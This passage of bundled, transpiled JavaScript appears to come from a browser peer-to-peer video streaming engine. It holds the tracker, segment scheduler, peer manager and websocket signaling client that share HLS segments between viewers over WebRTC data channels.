                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), u = n(0), l = r(u), f = n(19), d = r(f), h = n(21), p = r(h), g = n(2), v = (n(1), n(5)), y = r(v), m = 20, _ = 12, b = function (e) {
                    function t(e, n, r) {
                        i(this, t);
                        var o = a(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        return o.engine = e, o.logger = e.logger, o.config = r, o.connected = !1, o.scheduler = new d['default'](e, r), o.DCMap = new Map(), o.failedDCSet = new Set(), o.signalerWs = null, o.fetcher = n, o.peers = [], o.minConns = 0, o.requestMorePeers = (0, g.getPeersThrottle)(o._requestMorePeers, o), o.maxConns = y['default'].isMobile() ? _ : m, o;
                    }
                    return s(t, e), c(t, [
                        {
                            key: 'resumeP2P',
                            value: function value() {
                                var e = this;
                                this.fetcher.btAnnounce().then(function (t) {
                                    e.logger.info('announce request response ' + JSON.stringify(t)), e.engine.peerId = e.peerId = t.id, e.minConns = t.min_conns, t.share_only && e.scheduler && e.scheduler.setShareOnly(), (t.wifi_only || e.engine.config.wifiOnly) && 'wifi' !== e.engine.netType && (e.scheduler.downloadOnly = !0, e.logger.info('downloadOnly mode')), e.signalerWs = e._initSignalerWs(), 0 === t.peers.length ? e.requestMorePeers() : e._handlePeers(t.peers), e.engine.emit('peerId', e.peerId);
                                    var n = e.engine.config.getPeerId;
                                    n && 'function' == typeof n && n(e.peerId);
                                })['catch'](function (t) {
                                    e.logger.error(t);
                                });
                            }
                        },
                        {
                            key: 'stopP2P',
                            value: function value() {
                                this.fetcher.destroy(), this.fetcher = null, this.requestMorePeers(!0), this.scheduler.destroy(), this.scheduler = null, this.signalerWs && (this.signalerWs.destroy(), this.signalerWs = null), this.peers = [];
                                var e = !0, t = !1, n = void 0;
                                try {
                                    for (var r, o = this.DCMap.values()[Symbol.iterator](); !(e = (r = o.next()).done); e = !0) {
                                        r.value.destroy();
                                    }
                                } catch (e) {
                                    t = !0, n = e;
                                } finally {
                                    try {
                                        !e && o['return'] && o['return']();
                                    } finally {
                                        if (t)
                                            throw n;
                                    }
                                }
                                this.DCMap.clear(), this.failedDCSet.clear(), this.logger.warn('tracker stop p2p');
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                this.stopP2P(), this.removeAllListeners(), this.logger.warn('destroy tracker');
                            }
                        },
                        {
                            key: '_handlePeers',
                            value: function value(e) {
                                var t = this, n = !0, r = !1, i = void 0;
                                try {
                                    for (var a, s = e[Symbol.iterator](); !(n = (a = s.next()).done); n = !0) {
                                        var c = a.value;
                                        this.peers.push({ id: c.id });
                                    }
                                } catch (e) {
                                    r = !0, i = e;
                                } finally {
                                    try {
                                        !n && s['return'] && s['return']();
                                    } finally {
                                        if (r)
                                            throw i;
                                    }
                                }
                                this.peers = this.peers.filter(function (e) {
                                    for (var n = [].concat(o(t.DCMap.keys()), o(t.failedDCSet.keys())), r = 0; r < n.length; r++) {
                                        var i = n[r];
                                        if (e.id === i)
                                            return !1;
                                    }
                                    return !0;
                                });
                            }
                        },
                        {
                            key: '_tryConnectToAllPeers',
                            value: function value() {
                                var e = this;
                                0 !== this.peers.length && (this.logger.info('try connect to ' + this.peers.length + ' peers'), this.peers.forEach(function (t) {
                                    var n = new g.DataChannel(e.engine, e.peerId, t.id, !0, e.config);
                                    e.DCMap.set(t.id, n), e._setupDC(n);
                                }), this.peers = []);
                            }
                        },
                        {
                            key: '_setupDC',
                            value: function value(e) {
                                var t = this;
                                e.on(g.Events.DC_SIGNAL, function (n) {
                                    var r = e.remotePeerId;
                                    t.signalerWs.sendSignal(r, n);
                                }).once(g.Events.DC_ERROR, function () {
                                    t.logger.info('datachannel connect ' + e.channelId + ' failed'), t.scheduler && t.scheduler.deletePeer(e), t.DCMap['delete'](e.remotePeerId), t.failedDCSet.add(e.remotePeerId), e.destroy(), t.requestMorePeers(), e.connected && t.fetcher ? t.fetcher.decreConns() : t.fetcher.increFailConns();
                                }).once(g.Events.DC_CLOSE, function () {
                                    t.logger.info('datachannel ' + e.channelId + ' closed'), t.scheduler && t.scheduler.deletePeer(e), t.DCMap['delete'](e.remotePeerId), t.failedDCSet.add(e.remotePeerId), e.destroy(), t.requestMorePeers(), t.fetcher && t.fetcher.decreConns();
                                }).once(g.Events.DC_OPEN, function () {
                                    t.scheduler.handshakePeer(e);
                                    var n = t.scheduler.peersNum > t.minConns;
                                    t.requestMorePeers(n), t.fetcher.increConns();
                                });
                            }
                        },
                        {
                            key: '_initSignalerWs',
                            value: function value() {
                                var e = this, t = new p['default'](this.engine, this.peerId, this.config);
                                return t.onopen = function () {
                                    e.connected = !0, e.engine.emit('serverConnected', !0), e._tryConnectToAllPeers();
                                }, t.onmessage = function (t) {
                                    var n = t.action;
                                    switch (n) {
                                    case 'signal':
                                        var r = t.from_peer_id;
                                        if (e.failedDCSet.has(r) || !r)
                                            return;
                                        if (e.logger.debug('handle signal of ' + r), t.data)
                                            e._handleSignal(r, t.data);
                                        else {
                                            e.logger.info('signaling ' + r + ' not found');
                                            var o = e.DCMap.get(r);
                                            o && (o.destroy(), e.DCMap['delete'](r)), e.failedDCSet.add(r);
                                        }
                                        break;
                                    case 'reject':
                                        e.stopP2P();
                                        break;
                                    default:
                                        e.logger.warn('Signaler websocket unknown action ' + n);
                                    }
                                }, t.onclose = function () {
                                    e.connected = !1, e.engine.emit('serverConnected', !1);
                                }, t;
                            }
                        },
                        {
                            key: '_handleSignal',
                            value: function value(e, t) {
                                var n = this.DCMap.get(e);
                                if (n && n.connected)
                                    return void this.logger.info('datachannel had connected, signal ignored');
                                if (!n) {
                                    if (this.logger.debug('receive node ' + e + ' connection request'), this.failedDCSet.has(e))
                                        return;
                                    if (this.scheduler.peersNum > this.maxConns)
                                        return void this.logger.info('Peers num excess MAX_CONNS ' + this.maxConns);
                                    n = new g.DataChannel(this.engine, this.peerId, e, !1, this.config), this.DCMap.set(e, n), this._setupDC(n);
                                }
                                n.receiveSignal(t);
                            }
                        },
                        {
                            key: '_requestMorePeers',
                            value: function value() {
                                var e = this;
                                this.scheduler.peersNum <= this.minConns && this.fetcher.btGetPeers([].concat(o(this.DCMap.keys()), o(this.failedDCSet.keys()))).then(function (t) {
                                    e.logger.info('request more peers ' + JSON.stringify(t)), e._handlePeers(t.peers), e._tryConnectToAllPeers();
                                })['catch'](function (t) {
                                    e.logger.error('_requestMorePeers error ' + t);
                                });
                            }
                        }
                    ]), t;
                }(l['default']);
            t['default'] = b, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e) {
                if (Array.isArray(e)) {
                    for (var t = 0, n = Array(e.length); t < e.length; t++) {
                        n[t] = e[t];
                    }
                    return n;
                }
                return Array.from(e);
            }
            function i(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function a(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function s(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            function c(e) {
                return 0 === e ? v : 0.33 * e + 0.67;
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var u = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), l = n(0), f = r(l), d = n(2), h = n(20), p = r(h), g = n(1), v = 3, y = 50, m = 5, _ = Symbol('shareOnly'), b = function (e) {
                    function t(e, n) {
                        i(this, t);
                        var r = a(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        return r.engine = e, r.config = n, r.logger = e.logger, r.bufMgr = null, r.peerManager = new p['default'](), r.bitset = new Set(), r.bitCounts = new Map(), r.targetPeer = null, r._setupEngine(), r.currPlaySN = 0, r.currLostSN = -1, r.checkTimer = null, r.loadedPeerNum = 0, r.config.live ? r.maxPrefetchCount = m : (r.maxPrefetchCount = y, r.startCheckPeersTimer()), r.startCheckConnsTimer(), r.requestingMap = new Map(), r.dcDownloadTimeout = n.dcDownloadTimeout, r.mBufferedDuration = 0, r[_] = !1, r.downloadOnly = !1, r;
                    }
                    return s(t, e), u(t, [
                        {
                            key: 'startCheckPeersTimer',
                            value: function value() {
                                var e = this, t = c(this.loadedPeerNum);
                                this.logger.info('loaded peers ' + this.loadedPeerNum + ' next checkDelay is ' + t), this.loadedPeerNum = 0, this.checkTimer = window.setTimeout(function () {
                                    e.checkPeers(), e.startCheckPeersTimer();
                                }, 1000 * t);
                            }
                        },
                        {
                            key: 'startCheckConnsTimer',
                            value: function value() {
                                var e = this;
                                this.checkConnsTimer = window.setInterval(function () {
                                    var t = (0, g.getCurrentTs)(), n = !0, r = !1, o = void 0;
                                    try {
                                        for (var i, a = e.peerManager.getPeerValues()[Symbol.iterator](); !(n = (i = a.next()).done); n = !0) {
                                            var s = i.value, c = t - s.dataExchangeTs;
                                            c > 300 && e.peersNum >= 6 && (e.logger.warn('peer ' + s.remotePeerId + ' idle for ' + c + ', close it'), s.close());
                                        }
                                    } catch (e) {
                                        r = !0, o = e;
                                    } finally {
                                        try {
                                            !n && a['return'] && a['return']();
                                        } finally {
                                            if (r)
                                                throw o;
                                        }
                                    }
                                }, 15000);
                            }
                        },
                        {
                            key: 'updateLoadedSN',
                            value: function value(e) {
                                if (!this.bitset.has(e)) {
                                    this.bitset.add(e), this.bitCounts.has(e) && this.bitCounts['delete'](e);
                                    var t = {
                                        event: d.Events.DC_HAVE,
                                        sn: e
                                    };
                                    this._broadcastToPeers(t);
                                }
                            }
                        },
                        {
                            key: 'updatePlaySN',
                            value: function value(e) {
                                this.logger.info('updatePlaySN ' + e), this.currPlaySN = e;
                            }
                        },
                        {
                            key: 'checkPeers',
                            value: function value() {
                                var e = this.logger;
                                if (!(this.currLostSN >= 0 && this.currLostSN >= this.currPlaySN - 5) && this.hasPeers) {
                                    var t = this.peerManager.getAvailablePeers();
                                    if (0 !== t.length) {
                                        var n = [], r = this.config, i = r.prefetchNum, a = r.endSN, s = 0, c = this.loadingSN + 1;
                                        if (!this.config.live) {
                                            var u = Math.min.apply(Math, o(t.filter(function (e) {
                                                return e.endSN >= c;
                                            }).map(function (e) {
                                                return e ? e.startSN : 1 / 0;
                                            })));
                                            if (!isFinite(u))
                                                return;
                                            c < u && (c = u);
                                        }
                                        for (; n.length <= i && n.length < t.length && s < this.maxPrefetchCount;) {
                                            if (!this.config.live && c > a)
                                                return;
                                            if (this.bitset.has(c))
                                                c++;
                                            else {
                                                if (c !== this.loadingSN && this.bitCounts.has(c) && !this.requestingMap.has(c)) {
                                                    var l = !0, f = !1, d = void 0;
                                                    try {
                                                        for (var h, p = t[Symbol.iterator](); !(l = (h = p.next()).done); l = !0) {
                                                            var g = h.value;
                                                            if (!n.includes(g) && g.bitset.has(c)) {
                                                                g.requestDataBySN(c, !1), e.info('request prefetch ' + c + ' from peer ' + g.remotePeerId + ' downloadNum ' + g.downloadNum), n.push(g), this.requestingMap.set(c, g.remotePeerId);
                                                                break;
                                                            }
                                                        }
                                                    } catch (e) {
                                                        f = !0, d = e;
                                                    } finally {
                                                        try {
                                                            !l && p['return'] && p['return']();
                                                        } finally {
                                                            if (f)
                                                                throw d;
                                                        }
                                                    }
                                                }
                                                s++, c++;
                                            }
                                        }
                                        this.loadedPeerNum = n.length;
                                    }
                                }
                            }
                        },
                        {
                            key: 'chokePeerRequest',
                            value: function value(e) {
                                var t = { event: d.Events.DC_CHOKE };
                                e ? e.sendJson(t) : this._broadcastToPeers(t);
                            }
                        },
                        {
                            key: 'unchokePeerRequest',
                            value: function value(e) {
                                var t = { event: d.Events.DC_UNCHOKE };
                                e ? e.sendJson(t) : this._broadcastToPeers(t);
                            }
                        },
                        {
                            key: 'stopRequestFromPeers',
                            value: function value() {
                                var e = !0, t = !1, n = void 0;
                                try {
                                    for (var r, o = this.peerManager.getPeerValues()[Symbol.iterator](); !(e = (r = o.next()).done); e = !0) {
                                        r.value.choked = !0;
                                    }
                                } catch (e) {
                                    t = !0, n = e;
                                } finally {
                                    try {
                                        !e && o['return'] && o['return']();
                                    } finally {
                                        if (t)
                                            throw n;
                                    }
                                }
                            }
                        },
                        {
                            key: 'resumeRequestFromPeers',
                            value: function value() {
                                var e = !0, t = !1, n = void 0;
                                try {
                                    for (var r, o = this.peerManager.getPeerValues()[Symbol.iterator](); !(e = (r = o.next()).done); e = !0) {
                                        r.value.choked = !1;
                                    }
                                } catch (e) {
                                    t = !0, n = e;
                                } finally {
                                    try {
                                        !e && o['return'] && o['return']();
                                    } finally {
                                        if (t)
                                            throw n;
                                    }
                                }
                            }
                        },
                        {
                            key: 'setShareOnly',
                            value: function value() {
                                this[_] = !0;
                            }
                        },
                        {
                            key: 'deletePeer',
                            value: function value(e) {
                                var t = this;
                                this.peerManager.hasPeer(e.remotePeerId) && (this.peerManager.removePeer(e.remotePeerId), e.bitset.forEach(function (e) {
                                    t._decreBitCounts(e);
                                })), this._peersStats(this.peerManager.getPeerIds());
                            }
                        },
                        {
                            key: 'handshakePeer',
                            value: function value(e) {
                                this._setupDC(e), e.sendBitField(Array.from(this.bitset));
                            }
                        },
                        {
                            key: 'addPeer',
                            value: function value(e) {
                                this.logger.debug('add peer ' + e.remotePeerId), this.peerManager.addPeer(e.remotePeerId, e), this[_] && (e.choked = !0), this._peersStats(this.peerManager.getPeerIds());
                            }
                        },
                        {
                            key: 'peersHasSN',
                            value: function value(e) {
                                return this.bitCounts.has(e);
                            }
                        },
                        {
                            key: 'hasAndSetTargetPeer',
                            value: function value(e) {
                                var t = this.logger;
                                if (this.bufferedDuration <= 4.5)
                                    return !1;
                                if (this.requestingMap.has(e))
                                    return !0;
                                if (!this.hasIdlePeers || !this.peersHasSN(e))
                                    return !1;
                                var n = !0, r = !1, o = void 0;
                                try {
                                    for (var i, a = this.peerManager.getPeersOrderByWeight()[Symbol.iterator](); !(n = (i = a.next()).done); n = !0) {
                                        var s = i.value;
                                        if (s.bitset.has(e))
                                            return t.info('found sn ' + e + ' from peer ' + s.remotePeerId), this.targetPeer = s, !0;
                                    }
                                } catch (e) {
                                    r = !0, o = e;
                                } finally {
                                    try {
                                        !n && a['return'] && a['return']();
                                    } finally {
                                        if (r)
                                            throw o;
                                    }
                                }
                                return t.info('idle peers hasn\'t sn ' + e + ' or busy'), !1;
                            }
                        },
                        {
                            key: 'load',
                            value: function value(e, t, n) {
                                var r = this.logger;
                                this.context = e;
                                var o = e.frag, i = o.segId, a = o.sn;
                                this.callbacks = n, this.stats = {
                                    trequest: performance.now(),
                                    retry: 0,
                                    tfirst: 0,
                                    tload: 0,
                                    loaded: 0
                                }, this.criticalSeg = {
                                    sn: a,
                                    segId: i
                                };
                                var s = this.mBufferedDuration - 4.5;
                                s > this.dcDownloadTimeout ? s = this.dcDownloadTimeout : s < 3 && (s = 3), this.requestingMap.has(a) ? r.info('wait for criticalSeg segId ' + i + ' at ' + a + ' timeout ' + s) : (this.targetPeer.requestDataById(i, a, !0), r.info('request criticalSeg segId ' + i + ' at ' + a + ' timeout ' + s)), this.criticaltimeouter = window.setTimeout(this._criticaltimeout.bind(this), 1000 * s);
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                var e = this.logger;
                                this.peersNum > 0 && this.peerManager.clear(), this.removeAllListeners(), clearTimeout(this.checkTimer), clearInterval(this.checkConnsTimer), e.warn('destroy scheduler');
                            }
                        },
                        {
                            key: '_setupDC',
                            value: function value(e) {
                                var t = this, n = this.logger;
                                e.on(d.Events.DC_METADATA, function (n) {
                                    n.field && (e.bitset = new Set(n.field), n.field.forEach(function (e) {
                                        t.bitset.has(e) || t._increBitCounts(e);
                                    }), t.addPeer(e), t.downloadOnly && t.chokePeerRequest(e));
                                }).on(d.Events.DC_HAVE, function (r) {
                                    if (r.sn && e.bitset) {
                                        var o = r.sn;
                                        if (e.bitset.add(o), t.bitset.has(o) || t._increBitCounts(o), t.config.live) {
                                            var i = o - 40;
                                            i > 0 && (e.bitset['delete'](i), n.debug('datachannel bitset delete ' + i));
                                        }
                                    }
                                }).on(d.Events.DC_LOST, function (n) {
                                    if (n.sn && e.bitset) {
                                        var r = n.sn;
                                        e.bitset['delete'](r), t._decreBitCounts(r);
                                    }
                                }).on(d.Events.DC_PIECE_ACK, function (e) {
                                    e.size && t.engine.fetcher.reportUploaded(e.size);
                                }).on(d.Events.DC_PIECE, function (e) {
                                    t.criticalSeg && t.criticalSeg.segId === e.seg_id && (t.stats.tfirst = Math.max(performance.now(), t.stats.trequest));
                                }).on(d.Events.DC_PIECE_NOT_FOUND, function (r) {
                                    t.criticalSeg && t.criticalSeg.segId === r.seg_id && (window.clearTimeout(t.criticaltimeouter), n.info('DC_PIECE_NOT_FOUND'), t.callbacks.onTimeout(t.stats, t.context, null)), e.bitset['delete'](r.sn), t.requestingMap['delete'](r.sn), t._decreBitCounts(r.sn);
                                }).on(d.Events.DC_RESPONSE, function (r) {
                                    var o = r.level, i = r.sn, a = r.data, s = r.seg_id, c = t.criticalSeg && t.criticalSeg.segId === s;
                                    if (t.config.validateSegment(o, i, a)) {
                                        if (c) {
                                            n.info('receive criticalSeg seg_id ' + s), window.clearTimeout(t.criticaltimeouter), t.criticaltimeouter = null, e.miss = 0;
                                            var u = t.stats;
                                            u.tload = Math.max(u.tfirst, performance.now()), u.loaded = u.total = a.byteLength, t.criticalSeg = null;
                                            var l = t.context.frag;
                                            l.fromPeerId = e.remotePeerId, l.loadByP2P = !0, t.callbacks.onSuccess(r, u, t.context);
                                        } else
                                            t.bufMgr.handleFrag(i, o, s, a, e.remotePeerId, !1), t.updateLoadedSN(i);
                                        t.requestingMap['delete'](i);
                                    } else
                                        n.warn('segment ' + o + '-' + i + ' validate failed'), c && (window.clearTimeout(t.criticaltimeouter), t._criticaltimeout());
                                }).on(d.Events.DC_REQUEST, function (n) {
                                    var r = '';
                                    if ((r = n.seg_id ? n.seg_id : t.bufMgr.getSegIdbySN(n.sn)) && t.bufMgr.hasSegOfId(r)) {
                                        var o = t.bufMgr.getSegById(r);
                                        e.sendBuffer(o.sn, o.level, o.segId, o.data);
                                    } else
                                        e.sendJson({
                                            event: d.Events.DC_PIECE_NOT_FOUND,
                                            seg_id: r,
                                            sn: n.sn
                                        });
                                }).on(d.Events.DC_TIMEOUT, function (e) {
                                });
                            }
                        },
                        {
                            key: '_setupEngine',
                            value: function value() {
                                var e = this;
                                this.engine.on(d.Events.FRAG_LOADING, function (t) {
                                    e.loadingSN = t, e.config.live && e.checkPeers();
                                }).on(d.Events.FRAG_LOADED, function (t, n) {
                                    e.updateLoadedSN(t);
                                }).on(d.Events.FRAG_CHANGED, function (t, n) {
                                    e.updatePlaySN(t);
                                });
                            }
                        },
                        {
                            key: '_broadcastToPeers',
                            value: function value(e) {
                                var t = !0, n = !1, r = void 0;
                                try {
                                    for (var o, i = this.peerManager.getPeerValues()[Symbol.iterator](); !(t = (o = i.next()).done); t = !0) {
                                        o.value.sendJson(e);
                                    }
                                } catch (e) {
                                    n = !0, r = e;
                                } finally {
                                    try {
                                        !t && i['return'] && i['return']();
                                    } finally {
                                        if (n)
                                            throw r;
                                    }
                                }
                            }
                        },
                        {
                            key: '_getIdlePeer',
                            value: function value() {
                                return this.peerManager.getAvailablePeers();
                            }
                        },
                        {
                            key: '_decreBitCounts',
                            value: function value(e) {
                                if (this.bitCounts.has(e)) {
                                    var t = this.bitCounts.get(e);
                                    1 === t ? this.bitCounts['delete'](e) : this.bitCounts.set(e, t - 1);
                                }
                            }
                        },
                        {
                            key: '_increBitCounts',
                            value: function value(e) {
                                if (this.bitCounts.has(e)) {
                                    var t = this.bitCounts.get(e);
                                    this.bitCounts.set(e, t + 1);
                                } else
                                    this.bitCounts.set(e, 1);
                            }
                        },
                        {
                            key: '_criticaltimeout',
                            value: function value() {
                                var e = this, t = this.logger;
                                if (this.criticalSeg) {
                                    var n = this.criticalSeg.sn;
                                    if (t.info('critical request sn ' + n + ' timeout'), this.requestingMap.has(n) && (this.targetPeer = this.peerManager.getPeer(this.requestingMap.get(n))), this.config.httpRangeSupported && this.targetPeer && this.targetPeer.bufSN === n && this.targetPeer.bufArr.length > 0) {
                                        var r = d.Buffer.concat(this.targetPeer.bufArr);
                                        t.info('continue download from ' + this.context.frag.url + ' range: ' + r.byteLength + '-'), fetch(this.context.frag.url, { headers: { Range: 'bytes=' + r.byteLength + '-' } }).then(function (e) {
                                            return e.arrayBuffer();
                                        }).then(function (t) {
                                            var n = d.Buffer.from(t);
                                            e.engine.fetcher.reportFlow(n.byteLength);
                                            var o = d.Buffer.concat([
                                                    r,
                                                    n
                                                ]), i = new Uint8Array(o).buffer, a = e.stats;
                                            a.tload = Math.max(a.tfirst, performance.now()), a.loaded = a.total = o.byteLength;
                                            var s = e.context.frag;
                                            s.fromPeerId = e.targetPeer.remotePeerId, s.loadByP2P = !0, e.callbacks.onSuccess({ data: i }, a, e.context);
                                        })['catch'](function (n) {
                                            t.error('http partial download error ' + n), e.callbacks.onTimeout(e.stats, e.context, null);
                                        });
                                    } else
                                        this.callbacks.onTimeout(this.stats, this.context, null), this.targetPeer && this.targetPeer.loadtimeout();
                                    this.criticalSeg = null, this.criticaltimeouter = null;
                                }
                            }
                        },
                        {
                            key: '_peersStats',
                            value: function value(e) {
                                this.engine.emit('peers', e);
                                var t = this.engine.config.getPeersInfo;
                                t && 'function' == typeof t && t(e);
                            }
                        },
                        {
                            key: 'hasPeers',
                            get: function get() {
                                return this.peersNum > 0;
                            }
                        },
                        {
                            key: 'peersNum',
                            get: function get() {
                                return this.peerManager.size();
                            }
                        },
                        {
                            key: 'hasIdlePeers',
                            get: function get() {
                                var e = this.logger, t = this._getIdlePeer().length;
                                return e.info('peers: ' + this.peersNum + ' idle peers: ' + t), t > 0;
                            }
                        },
                        {
                            key: 'bufferedDuration',
                            get: function get() {
                                for (var e = this.engine.media, t = 0, n = e.currentTime, r = e.buffered, o = r.length - 1; o >= 0; o--) {
                                    if (n >= r.start(o) && n <= r.end(o)) {
                                        t = r.end(o) - n;
                                        break;
                                    }
                                }
                                return this.logger.info('bufferedDuration ' + t), this.mBufferedDuration = t, t > 0 ? t : 0;
                            }
                        },
                        {
                            key: 'bufferManager',
                            set: function set(e) {
                                var t = this;
                                this.bufMgr = e, e.on(d.Events.BM_LOST, function (e) {
                                    t.logger.debug('bufMgr lost ' + e), t.currLostSN = e, t.config.live || t._broadcastToPeers({
                                        event: d.Events.DC_LOST,
                                        sn: e
                                    }), t.bitset['delete'](e), t.bitCounts['delete'](e);
                                });
                            }
                        }
                    ]), t;
                }(f['default']);
            t['default'] = b, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                if (Array.isArray(e)) {
                    for (var t = 0, n = Array(e.length); t < e.length; t++) {
                        n[t] = e[t];
                    }
                    return n;
                }
                return Array.from(e);
            }
            function o(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var i = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), a = function () {
                    function e() {
                        o(this, e), this.peerMap = new Map();
                    }
                    return i(e, [
                        {
                            key: 'isEmpty',
                            value: function value() {
                                return 0 === this.peerMap.size;
                            }
                        },
                        {
                            key: 'size',
                            value: function value() {
                                return this.peerMap.size;
                            }
                        },
                        {
                            key: 'clear',
                            value: function value() {
                                this.peerMap.clear();
                            }
                        },
                        {
                            key: 'getPeers',
                            value: function value() {
                                return [].concat(r(this.peerMap.values()));
                            }
                        },
                        {
                            key: 'getPeerValues',
                            value: function value() {
                                return this.peerMap.values();
                            }
                        },
                        {
                            key: 'hasPeer',
                            value: function value(e) {
                                return this.peerMap.has(e);
                            }
                        },
                        {
                            key: 'addPeer',
                            value: function value(e, t) {
                                this.peerMap.set(e, t);
                            }
                        },
                        {
                            key: 'getPeerIds',
                            value: function value() {
                                return [].concat(r(this.peerMap.keys()));
                            }
                        },
                        {
                            key: 'removePeer',
                            value: function value(e) {
                                this.peerMap['delete'](e);
                            }
                        },
                        {
                            key: 'getPeersOrderByWeight',
                            value: function value() {
                                var e = this.getPeers().filter(function (e) {
                                    return e.isAvailableUrgently;
                                });
                                return e.sort(function (e, t) {
                                    return 0 === t.weight ? 1 : 0 === e.weight ? -1 : t.weight - e.weight;
                                }), e;
                            }
                        },
                        {
                            key: 'getPeer',
                            value: function value(e) {
                                return this.peerMap.get(e);
                            }
                        },
                        {
                            key: 'getAvailablePeers',
                            value: function value() {
                                return this.getPeers().filter(function (e) {
                                    return e.isAvailable;
                                });
                            }
                        }
                    ]), e;
                }();
            t['default'] = a, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function i(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function a(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var s = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), c = n(0), u = r(c), l = n(22), f = r(l), d = n(1), h = function (e) {
                    function t(e, n, r) {
                        o(this, t);
                        var a = i(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        return a.compressed = !1, a.engine = e, a.logger = e.logger, a.peerId = n, a.config = r, a.wsAddr = r.wsSignalerAddr, a.connected = !1, a._ws = a._init(n), a;
                    }
                    return a(t, e), s(t, [
                        {
                            key: '_init',
                            value: function value(e) {
                                var t = this, n = {
                                        maxRetries: this.config.wsMaxRetries,
                                        minReconnectionDelay: 1000 * (0, d.randomNum)(this.config.wsReconnectInterval, 60),
                                        maxReconnectionDelay: 300000
                                    }, r = '?id=' + e, o = new f['default'](this.wsAddr + r, void 0, n);
                                return o.onopen = function () {
                                    t.logger.info('Signaler websocket connection opened'), t.connected = !0, t.onopen && t.onopen(), t._startPing();
                                }, o.push = o.send, o.send = function (e) {
                                    var n = JSON.stringify(e);
                                    o.push(n), t._resetPing();
                                }, o.onmessage = function (e) {
                                    var n = e.data, r = JSON.parse(n);
                                    'compress' === r.action ? r.supported && (t.logger.info('signal compress is supported'), t.compressed = !0, o.binaryType = 'arraybuffer') : t.onmessage && t.onmessage(r);
                                }, o.onclose = function (e) {
                                    t.logger.warn('Signaler websocket closed ' + e.code + ' ' + e.reason), t.onclose && t.onclose(), t.connected = !1, t._stopPing();
                                }, o.onerror = function (e) {
                                    t.logger.error('Signaler websocket error');
                                }, o;
                            }
                        },
                        {
                            key: 'sendSignal',
                            value: function value(e, t) {
                                var n = {
                                    action: 'signal',
                                    to_peer_id: e,
                                    data: t
                                };
                                this._send(n);
                            }
                        },
                        {
                            key: '_send',
                            value: function value(e) {
                                this.connected ? this._ws.send(e) : this.logger.warn('signaler closed, send msg failed');
                            }
                        },
                        {
                            key: '_askCompress',
                            value: function value() {
                                if (this.config.signalCompressed) {
                                    var e = {
                                        action: 'compress',
                                        supported: !0
                                    };
                                    this._send(e);
                                }
                            }
                        },
                        {
                            key: '_startPing',
                            value: function value() {
                                var e = this;
                                this.pingTimer = window.setInterval(function () {
                                    var t = { action: 'heartbeat' };
                                    e._send(t);
                                }, 120000);
                            }
                        },
                        {
                            key: '_resetPing',
                            value: function value() {
                                this._stopPing(), this._startPing();
                            }
                        },
                        {
                            key: '_stopPing',
                            value: function value() {
                                window.clearInterval(this.pingTimer), this.pingTimer = null;
                            }
                        },
                        {
                            key: 'close',
                            value: function value() {
                                this.logger.warn('close signal client'), this.connected = !1, this._ws.close(1000, 'stop signaling', { keepClosed: !0 });
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                this.close(), this._ws = null, this.removeAllListeners(), this.logger.warn('destroy signaler');
                            }
                        }
                    ]), t;
                }(u['default']);
            t['default'] = h, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            var r = function r(e) {
                    return e && 2 === e.CLOSING;
                }, o = function o() {
                    return 'undefined' != typeof WebSocket && r(WebSocket);
                }, i = function i() {
                    return {
                        constructor: o() ? WebSocket : null,
                        maxReconnectionDelay: 10000,
                        minReconnectionDelay: 1500,
                        reconnectionDelayGrowFactor: 1.3,
